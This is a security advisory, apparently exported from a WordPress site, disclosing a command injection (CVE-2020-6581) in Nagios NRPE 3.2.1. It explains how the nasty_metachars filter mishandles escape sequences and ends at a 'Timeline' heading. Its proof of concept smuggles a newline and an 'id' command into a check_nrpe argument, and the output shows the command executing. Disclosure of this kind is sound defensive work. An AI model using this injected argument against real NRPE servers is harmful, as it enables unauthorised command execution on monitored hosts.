{"id":16659,"date":"2021-07-08T11:51:22","date_gmt":"2021-07-08T09:51:22","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2020-0002\/"},"modified":"2021-07-19T14:14:19","modified_gmt":"2021-07-19T12:14:19","slug":"usd-2020-0002","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2020-0002\/","title":{"rendered":"usd-2020-0002"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2020-0002 (CVE-2020-6581) | Nagios NRPE v.3.2.1<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2020-0002<\/span>
CVE Number<\/strong>: CVE-2020-6581<\/span>
Affected Product<\/strong>: Nagios NRPE<\/span>
Affected Version<\/strong>: v.3.2.1<\/span>
Vulnerability Type<\/strong>: Insufficient Filtering of Configuration file<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: https:\/\/www.nagios.org\/<\/a><\/span>
Vendor Status<\/strong>: Fixed in v.4.0.0 (not verified)<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

Insufficient Filtering and incorrect parsing of the configuration file may lead to command injection.<\/span><\/p>\n

<\/span><\/p>\n

Prerequisites<\/h3>\n

NRPE has to be compiled with command line parameter support. Additionally, dont_blame_nrpe option inside the NRPE configuration file has to be enabled.<\/p>\n

Proof of Concept (PoC)<\/h3>\n

If NRPE is compiled with command line parameter support and if the corresponding option is enabled inside of the NRPE configuration file, NRPE are allowed to contain additional parameters that are passed as command line parameters to the configured monitoring scripts. In order to prevent exploitation by shell meta characters like ;|&$\u2026, NRPE implements a default blacklist of nasty meta characters:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]\/\/ file: src\/nrpe.c line: 74
\n#define NASTY_METACHARS \"|`&amp;&gt;&lt;'\\\\[]{};\\r\\n\"<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n

The same definition of nasty meta characters can also be found in the default configuration file:<\/p>\n<\/div>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"] \/\/ file: \/etc\/nagios\/nrpe.cfg line: 267 - 271
\n# NASTY METACHARACTERS
\n# This option allows you to override the list of characters that cannot
\n# be passed to the NRPE daemon.<\/p>\n

# nasty_metachars=\"|`&amp;&gt;&lt;'\\\\[]{};\\r\\n\"<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

Unfortunately, while parsing the configuration file, special characters like \u201a\\n\u2018 inside the nasty_metachars <\/strong>variable are interpreted literally
and loose their special meaning. E.g. \u201a\\n\u2018 will disallow the two characters \u201a\\\u2018 and \u2019n\u2018 instead of a newline.<\/p>\n

Attack scenario: Imagine a server administrator wants also to add a wildcard (*<\/strong>) to the blacklist of not allowed characters. Most likely, he will
just uncomment the nasty_metachar<\/strong>\u00a0option from the configuration file and add his desired character like this:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]\/\/ file: \/etc\/nagios\/nrpe.cfg line: 267 - 271
\n# NASTY METACHARACTERS
\n# This option allows you to override the list of characters that cannot
\n# be passed to the NRPE daemon.<\/p>\n

nasty_metachars=\"|`&amp;&gt;&lt;'\\\\[]{};\\r\\n*\"<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

Despite looking reasonable, the NRPE service is now again vulnerable to command injections, as shown in the following example:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"] [pentester@kali ~]$ cat \/etc\/nagios\/nrpe.cfg | grep -E 'nasty|POC'
\nnasty_metachars=\"|`&amp;&gt;&lt;'\\\\[]{};\\r\\n*\"
\ncommand[check_POC]=\/usr\/lib\/nagios\/plugins\/check_POC $ARG1$
\n[pentester@kali ~]$ cat \/usr\/lib\/nagios\/plugins\/check_POC
\n#!\/bin\/bash
\necho \"[+] POC finished\"<\/p>\n

[pentester@kali ~]$
\n[pentester@kali ~]$ \/usr\/lib\/nagios\/plugins\/check_nrpe -n -H 127.0.0.1 -c checkPOC -a \"$(echo -e \"\\nid\")\"
\n[+] POC finished<\/p>\n

uid=998(nagios) gid=997(nagios) groups=997(nagios)<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

While parsing the <\/span>nasty_metachars<\/strong>\u00a0option of the configuration file, special characters should be interpreted correctly.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n